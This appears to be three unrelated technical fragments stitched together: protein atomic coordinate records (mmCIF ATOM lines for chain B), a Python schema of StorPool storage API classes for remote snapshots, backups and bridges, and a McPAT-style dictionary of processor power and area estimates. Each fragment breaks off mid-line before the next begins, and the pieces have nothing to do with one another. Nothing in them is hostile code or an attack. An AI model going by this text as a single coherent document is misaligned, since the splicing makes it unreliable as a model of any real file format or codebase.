ATOM 2747 N N . THR B 1 132 ? 66.400 -31.556 16.308 1.00 14.98 ? 133 THR B N 1
ATOM 2748 C CA . THR B 1 132 ? 67.036 -32.170 17.433 1.00 15.50 ? 133 THR B CA 1
ATOM 2749 C C . THR B 1 132 ? 66.060 -32.948 18.255 1.00 15.02 ? 133 THR B C 1
ATOM 2750 O O . THR B 1 132 ? 66.352 -34.069 18.724 1.00 13.11 ? 133 THR B O 1
ATOM 2751 C CB . THR B 1 132 ? 67.809 -31.139 18.315 1.00 16.65 ? 133 THR B CB 1
ATOM 2752 O OG1 . THR B 1 132 ? 68.854 -30.570 17.510 1.00 16.88 ? 133 THR B OG1 1
ATOM 2753 C CG2 . THR B 1 132 ? 68.452 -31.831 19.479 1.00 17.53 ? 133 THR B CG2 1
ATOM 2754 N N . ALA B 1 133 ? 64.865 -32.365 18.401 1.00 13.18 ? 134 ALA B N 1
ATOM 2755 C CA . ALA B 1 133 ? 63.859 -32.980 19.224 1.00 12.82 ? 134 ALA B CA 1
ATOM 2756 C C . ALA B 1 133 ? 63.406 -34.275 18.552 1.00 11.29 ? 134 ALA B C 1
ATOM 2757 O O . ALA B 1 133 ? 63.280 -35.284 19.203 1.00 10.34 ? 134 ALA B O 1
ATOM 2758 C CB . ALA B 1 133 ? 62.735 -32.040 19.417 1.00 12.04 ? 134 ALA B CB 1
ATOM 2759 N N . MET B 1 134 ? 63.229 -34.257 17.239 1.00 10.81 ? 135 MET B N 1
ATOM 2760 C CA . MET B 1 134 ? 62.909 -35.481 16.528 1.00 11.16 ? 135 MET B CA 1
ATOM 2761 C C . MET B 1 134 ? 63.971 -36.590 16.716 1.00 12.72 ? 135 MET B C 1
ATOM 2762 O O . MET B 1 134 ? 63.643 -37.715 17.124 1.00 13.37 ? 135 MET B O 1
ATOM 2763 C CB . MET B 1 134 ? 62.753 -35.179 15.071 1.00 11.45 ? 135 MET B CB 1
ATOM 2764 C CG . MET B 1 134 ? 62.536 -36.499 14.260 1.00 11.17 ? 135 MET B CG 1
ATOM 2765 S SD . MET B 1 134 ? 61.116 -37.469 14.662 1.00 11.86 ? 135 MET B SD 1
ATOM 2766 C CE . MET B 1 134 ? 60.793 -38.284 13.090 1.00 11.48 ? 135 MET B CE 1
ATOM 2767 N N . ASN B 1 135 ? 65.258 -36.246 16.608 1.00 12.28 ? 136 ASN B N 1
ATOM 2768 C CA . ASN B 1 135 ? 66.247 -37.268 16.807 1.00 13.15 ? 136 ASN B CA 1
ATOM 2769 C C . ASN B 1 135 ? 66.160 -37.839 18.205 1.00 12.02 ? 136 ASN B C 1
ATOM 2770 O O . ASN B 1 135 ? 66.427 -38.980 18.453 1.00 12.71 ? 136 ASN B O 1
ATOM 2771 C CB . ASN B 1 135 ? 67.676 -36.729 16.564 1.00 12.12 ? 136 ASN B CB 1
ATOM 2772 C CG . ASN B 1 135 ? 67.983 -36.634 15.100 1.00 14.88 ? 136 ASN B CG 1
ATOM 2773 O OD1 . ASN B 1 135 ? 67.182 -37.109 14.244 1.00 15.26 ? 136 ASN B OD1 1
ATOM 2774 N ND2 . ASN B 1 135 ? 69.101 -36.019 14.776 1.00 13.93 ? 136 ASN B ND2 1
ATOM 2775 N N . LYS B 1 136 ? 65.808 -37.036 19.191 1.00 12.96 ? 137 LYS B N 1
ATOM 2776 C CA . LYS B 1 136 ? 65.688 -37.623 20.551 1.00 12.01 ? 137 LYS B CA 1
ATOM 2777 C C . LYS B 1 136 ? 64.510 -38.605 20.613 1.00 14.24 ? 137 LYS B C 1
ATOM 2778 O O . LYS B 1 136 ? 64.568 -39.605 21.318 1.00 13.74 ? 137 LYS B O 1
ATOM 2779 C CB . LYS B 1 136 ? 65.537 -36.530 21.588 1.00 12.69 ? 137 LYS B CB 1
ATOM 2780 C CG . LYS B 1 136 ? 66.783 -35.664 21.790 1.00 13.26 ? 137 LYS B CG 1
ATOM 2781 C CD . LYS B 1 136 ? 67.938 -36.464 22.320 1.00 13.66 ? 137 LYS B CD 1
ATOM 2782 C CE . LYS B 1 136 ? 69.139 -35.561 22.514 1.00 13.67 ? 137 LYS B CE 1
ATOM 2783 N NZ . LYS B 1 136 ? 70.301 -36.383 22.903 1.00 15.49 ? 137 LYS B NZ 1
ATOM 2784 N N . LEU B 1 137 ? 63.428 -38.289 19.921 1.00 11.76 ? 138 LEU B N 1
ATOM 2785 C CA . LEU B 1 137 ? 62.251 -39.176 19.873 1.00 13.66 ? 138 LEU B CA 1
ATOM 2786 C C . LEU B 1 137 ? 62.703 -40.478 19.210 1.00 14.43 ? 138 LEU B C 1
ATOM 2787 O O . LEU B 1 137 ? 62.386 -41.575 19.706 1.00 13.75 ? 138 LEU B O 1
ATOM 2788 C CB . LEU B 1 137 ? 61.107 -38.556 19.074 1.00 12.84 ? 138 LEU B CB 1
ATOM 2789 C CG . LEU B 1 137 ? 60.517 -37.237 19.618 1.00 12.72 ? 138 LEU B CG 1
ATOM 2790 C CD1 . LEU B 1 137 ? 59.399 -36.784 18.744 1.00 12.12 ? 138 LEU B CD1 1
ATOM 2791 C CD2 . LEU B 1 137 ? 60.036 -37.297 21.065 1.00 12.48 ? 138 LEU B CD2 1
ATOM 2792 N N . ILE B 1 138 ? 63.447 -40.323 18.132 1.00 14.93 ? 139 ILE B N 1
ATOM 2793 C CA . ILE B 1 138 ? 63.919 -41.484 17.375 1.00 14.82 ? 139 ILE B CA 1
ATOM 2794 C C . ILE B 1 138 ? 64.749 -42.404 18.246 1.00 16.99 ? 139 ILE B C 1
ATOM 2795 O O . ILE B 1 138 ? 64.553 -43.649 18.234 1.00 14.17 ? 139 ILE B O 1
ATOM 2796 C CB . ILE B 1 138 ? 64.688 -41.099 16.100 1.00 14.37 ? 139 ILE B CB 1
ATOM 2797 C CG1 . ILE B 1 138 ? 63.679 -40.554 15.126 1.00 12.95 ? 139 ILE B CG1 1
ATOM 2798 C CG2 . ILE B 1 138 ? 65.289 -42.328 15.449 1.00 14.07 ? 139 ILE B CG2 1
ATOM 2799 C CD1 . ILE B 1 138 ? 64.299 -39.706 14.026 1.00 13.42 ? 139 ILE B CD1 1
ATOM 2800 N N . ALA B 1 139 ? 65.731 -41.794 18.916 1.00 15.46 ? 140 ALA B N 1
ATOM 2801 C CA . ALA B 1 139 ? 66.544 -42.475 19.888 1.00 18.22 ? 140 ALA B CA 1
ATOM 2802 C C . ALA B 1 139 ? 65.711 -43.164 20.962 1.00 16.54 ? 140 ALA B C 1
ATOM 2803 O O . ALA B 1 139 ? 65.962 -44.304 21.303 1.00 15.73 ? 140 ALA B O 1
ATOM 2804 C CB . ALA B 1 139 ? 67.550 -41.498 20.537 1.00 19.01 ? 140 ALA B CB 1
ATOM 2805 N N . GLN B 1 140 ? 64.670 -42.504 21.462 1.00 17.19 ? 141 GLN B N 1
ATOM 2806 C CA . GLN B 1 140 ? 63.859 -43.087 22.557 1.00 16.44 ? 141 GLN B CA 1
ATOM 2807 C C | |
cluster generation when the disk was active on a running server. -1 since the disk is currently up.
objectsCount: The maximum amount of object that can exists on the disk.
objectsAllocated: Statistics about the amount of objects to be allocated on this disk.
storedSize: Statistics about the amount of cilent data to be stored on this disk.
onDiskSize: Statistics about the total amount of space occupied by the objects on this disk.
'''
DiskTarget = either(UpDiskTarget, DownDiskTarget)
@JsonObject(storedSize=int, objectsCount=int)
class VolumeBalancerSlot(object):
'''
storedSize: Number of bytes of client data stored on the corresponding disk set.
objectsCount: Number of objects on the corresponding disk set.
'''
@JsonObject(placeAll=PlacementGroupName, placeTail=PlacementGroupName, placeHead=PlacementGroupName, replication=VolumeReplication,
feasible=bool, blocked=bool,
size=int, storedSize=int, objectsCount=int,
root=either(VolumeNameOrGlobalId, SnapshotNameOrGlobalId), volumes=[either(VolumeNameOrGlobalId, SnapshotNameOrGlobalId)],
targetDiskSets=[[DiskId]], slots=[VolumeBalancerSlot], reuseServer=maybe(bool))
class VolumeBalancerAllocationGroup(object):
'''
root: The name of this group's root volume or snapshot
volumes: The names of all volumes and snapshots in this group.
size: The total size of all volumes and snapshots in the group.
storedSize: The total number of bytes of client data on all volumes and snapshots in this group.
objectsCount: The total number of objects of all volumes and snapshots in the group.
replication: The number of copies/replicas kept.
placeAll: The name of a placement group which describes the disks to be used for all but the last replica.
placeTail: The name of a placement group which describes the disks to be used for the last replica, the one used for reading.
placeHead: The name of a placement group which describes the disks to be used for the first replica.
feasible: Can new volumes be allocated with the current placement policy and redundancy constraints.
blocked: Can this volume be rebalanced, or is rebalancing impossible with the current placement policy due to for example missing or soft-ejecting drives.
targetDiskSets: The current sets of disks that the volume's data should be stored on.
slots: Statistics about each of the current disk sets.
reuseServer: allow placement of replicas on same server
'''
@JsonObject(remoteLocation=RemoteLocationName, remoteId=GlobalVolumeId, name=maybe(VolumeName), placeAll=maybe(PlacementGroupName), placeTail=maybe(PlacementGroupName), placeHead=maybe(PlacementGroupName), replication=maybe(VolumeReplication), template=maybe(VolumeTemplateName), export=maybe(bool), tags=maybe({VolumeTagName: VolumeTagValue}))
class SnapshotFromRemoteDesc(object):
'''
remoteLocation: The name of the remote location to fetch the snapshot from.
remoteId: The global snapshot identifier.
name: The name of the new snapshot.
placeAll: The name of a placement group which describes the disks to be used for all but the last replica.
placeTail: The name of a placement group which describes the disks to be used for the last replica, the one used for reading.
placeHead: The name of a placement group which describes the disks to be used for the first replica.
replication: The number of copies/replicas kept.
template: The name of the template that the settings of the new volume are based on.
export: Auto-export the snapshot after creating it. e.g. for backup.
tags: Arbitrary short name/value pairs stored with the snapshot.
'''
@JsonObject(remoteLocation=RemoteLocationName, remoteId=GlobalVolumeId, name=VolumeName, placeAll=maybe(PlacementGroupName), placeTail=maybe(PlacementGroupName), placeHead=maybe(PlacementGroupName), replication=maybe(VolumeReplication), template=maybe(VolumeTemplateName), export=maybe(bool), tags=maybe({VolumeTagName: VolumeTagValue}))
class VolumeFromRemoteDesc(object):
'''
remoteLocation: The name of the remote location to fetch the snapshot from.
remoteId: The global snapshot identifier.
name: The name of the new volume.
placeAll: The name of a placement group which describes the disks to be used for all but the last replica.
placeTail: The name of a placement group which describes the disks to be used for the last replica, the one used for reading.
placeHead: The name of a placement group which describes the disks to be used for the first replica.
replication: The number of copies/replicas kept.
template: The name of the template that the settings of the new volume are based on.
export: Auto-export the volume after creating it. e.g. for backup.
tags: Arbitrary short name/value pairs stored with the volume.
'''
@JsonObject(snapshot=SnapshotNameOrGlobalId, location=RemoteLocationName)
class SnapshotExportDesc(object):
'''
snapshot: The name of the snapshot.
location: The name of the remote location to grant access to.
'''
@JsonObject(snapshot=SnapshotNameOrGlobalId, location=maybe(RemoteLocationName), all=maybe(bool), force=maybe(bool))
class SnapshotUnexportDesc(object):
'''
snapshot: The name of the snapshot.
location: The name of the remote location to revoke access from.
all: Revoke access from all locations.
force: Don't check if the snapshot is still recovering in the remote location.
'''
@JsonObject(volume=VolumeNameOrGlobalId, location=RemoteLocationName, tags=maybe({VolumeTagName: VolumeTagValue}))
class VolumeBackupDesc(object):
'''
volume: The name of the volume to backup.
location: The remote location to backup to.
tags: Arbitrary short name/value pairs stored with the volume.
'''
@JsonObject(remoteId=GlobalVolumeId, snapshotGlobalId=GlobalVolumeId)
class VolumesGroupBackupSingle(object):
'''
remoteId: the globally unique id of the backup.
snapshotGlobalId: the globally unique id of the backup.
'''
@JsonObject(location=RemoteLocationName, volumes=[VolumeNameOrGlobalId], tags=maybe({VolumeTagName: VolumeTagValue}))
class VolumesGroupBackupDesc(object):
'''
volumes: The names of the volumes to backup.
location: The remote location to backup to.
tags: Arbitrary short name/value pairs stored with the volume.
'''
@JsonObject(cluster=maybe(ClusterName), clusterId=maybe(ClusterId), onAttached=maybe(OnAttached))
class VolumeMoveToRemoteDesc(object):
'''
cluster: The name of the target cluster, use this or clusterId
clusterId: The id of the target cluster, use this or cluster
onAttached: What to do if volume is attached. "fail" if not specified
'''
@JsonObject(cluster=maybe(ClusterName), clusterId=maybe(ClusterId))
class VolumeExportDesc(object):
'''
cluster: The name of the target cluster, use this or clusterId
clusterId: The id of the target cluster, use this or cluster
'''
@JsonObject(onRemoteAttached=maybe(OnAttached))
class VolumeAcquireDesc(object):
'''
onRemoteAttached: What to do if volume is attached. "fail" if not specified
'''
@JsonObject(
name=VolumeNameOrGlobalId,
location=RemoteLocationName,
creationTimestamp=longType,
size=VolumeSize,
remoteId=GlobalVolumeId,
onVolume=maybe(VolumeNameOrGlobalId),
localSnapshot=maybe(SnapshotNameOrGlobalId),
tags=maybe({VolumeTagName: VolumeTagValue}),
createdFromGlobalId=internal(GlobalVolumeId),
createdFromVisibleVolumeId=internal(longType)
)
class RemoteSnapshot(object):
'''
name: The name of the snapshot.
location: Where the snapshot is located.
creationTimestamp: The snapshot's creation timestamp (UNIX timestamp).
size: The snapshots's size in bytes.
remoteId: The global snapshot identifier.
onVolume: The name of the local volume (if any) on which the snapshot was created.
localSnapshot: The name of the local snapshot (if any) which is a copy of the remote snapshot.
tags: Arbitrary short name/value pairs stored with the snapshot.
'''
@JsonObject(id=LocationId, name=RemoteLocationName)
class RemoteLocationBase(object):
'''
id: A StorPool-provided unique location id.
name: The human-readable location name.
'''
@JsonObject(sendBufferSize=longType, recvBufferSize=longType)
class RemoteLocation(RemoteLocationBase):
'''
sendBufferSize: the size of the TCP send buffer for the location
recvBufferSize: the size of the TCP recieve buffer for the location
'''
@JsonObject(
location=RemoteLocationName,
sendBufferSize=maybe(longType),
recvBufferSize=maybe(longType)
)
class RemoteLocationUpdateDesc(object):
'''
location: The human-readable location name.
sendBufferSize: the size of the TCP send buffer for the location
recvBufferSize: the size of the TCP recieve buffer for the location
'''
@JsonObject(location=RemoteLocationName, name=RemoteLocationName)
class RemoteLocationRenameDesc(object):
'''
location: The human-readable location name.
name: The new human-readable location name.
'''
@JsonObject(id=SubClusterId, location=RemoteLocationName)
class RemoteClusterBase(object):
'''
id: A StorPool-provided unique cluster subid
location: the cluster's location name
'''
@JsonObject(name=maybe(RemoteClusterName))
class RemoteClusterAddDesc(RemoteClusterBase):
'''
name: The human-readable cluster name
'''
@JsonObject(name=RemoteClusterName)
class RemoteCluster(RemoteClusterBase):
'''
name: The human-readable cluster name
'''
@JsonObject(
name=maybe(RemoteClusterName),
location=maybe(RemoteLocationName),
id=maybe(SubClusterId),
clusterWillNotBeComingBack=maybe(bool)
)
class RemoteClusterRemoveDesc(object):
'''
name: The human-readable cluster name.
location: the cluster's location name
id: A StorPool-provided unique cluster subid
clusterWillNotBeComingBack: Set this flag if the remote cluster will not be registered again in the future. Default is false.
'''
@JsonObject(cluster=RemoteClusterName, name=RemoteClusterName)
class RemoteClusterRenameDesc(object):
'''
cluster: The human-readable cluster name.
name: The new human-readable cluster name.
'''
@JsonObject(
ip=str,
publicKey=str,
minimumDeleteDelay=maybe(longType),
noCrypto=maybe(bool)
)
class RemoteBridgeBase(object):
'''
ip: the ip address of the remote bridge
publicKey: the public key of the remote bridge
minimumDeleteDelay: minimum value for the deferred deletion
noCrypto: Set this flag if the connection with the remote bridge should not be encrypted
'''
@JsonObject(location=RemoteLocationName)
class RemoteBridgeAddLocationDesc(RemoteBridgeBase):
'''
location: the location of the remote bridge
'''
@JsonObject(remote=RemoteClusterName)
class RemoteBridgeAddClusterDesc(RemoteBridgeBase):
'''
remote: the cluster of the remote bridge
'''
RemoteBridgeAddDesc = either(
RemoteBridgeAddLocationDesc, RemoteBridgeAddClusterDesc
)
@JsonObject(ip=str)
class RemoteBridgeRemoveDesc(object):
'''
ip: the ip address of the remote bridge
'''
@JsonObject(
location=RemoteLocationName,
cluster=maybe(RemoteClusterName),
remote=either(RemoteClusterName, RemoteLocationName)
)
class RemoteBridge(RemoteBridgeBase):
'''
location: the location of the remote bridge
cluster: the cluster of the remote bridge
remote: the cluster or the location of the remote bridge
'''
@JsonObject(snapshot=SnapshotNameOrGlobalId, location=RemoteLocationName, globalId=GlobalVolumeId, backingUp=maybe(bool), volumeId=internal(longType), visibleVolumeId=internal(longType))
class Export(object):
'''
snapshot: The name of the snapshot.
location: Name of the location the snapshot is exported to
globalId: The global snapshot identifier.
backingUp: Is this a backup in making
'''
@JsonObject(location=RemoteLocationName, globalSnapshotId=GlobalVolumeId, targetDeleteDate=maybe(int), deleteAfter=maybe(int))
class SnapshotRemoteUnexportDesc(object):
'''
location: name of the location to unexport from
globalSnapshotId: the id of the snapshot to be unexported
targetDeleteDate: if not 0 instruct the remote location to delete the snapshot at the specified date. Remote side may not allow this due to configuration or the snapshot beeeing | |
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0539232,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.17736,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0861759,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.138998,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0701617,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.295336,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0985609,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.01561,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0036146,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0261383,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0267322,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0261383,
'Execution Unit/Register Files/Runtime Dynamic': 0.0303468,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0550661,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.160511,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.09426,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000448729,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000448729,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000394054,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000154301,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00038401,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00167552,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00418763,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0256983,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.63463,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.050506,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0872831,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.93248,
'Instruction Fetch Unit/Runtime Dynamic': 0.169351,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0299709,
'L2/Runtime Dynamic': 0.00737748,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.24019,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.492783,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0324516,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0324515,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.39343,
'Load Store Unit/Runtime Dynamic': 0.685274,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.08002,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.16004,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0283994,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0288489,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.101635,
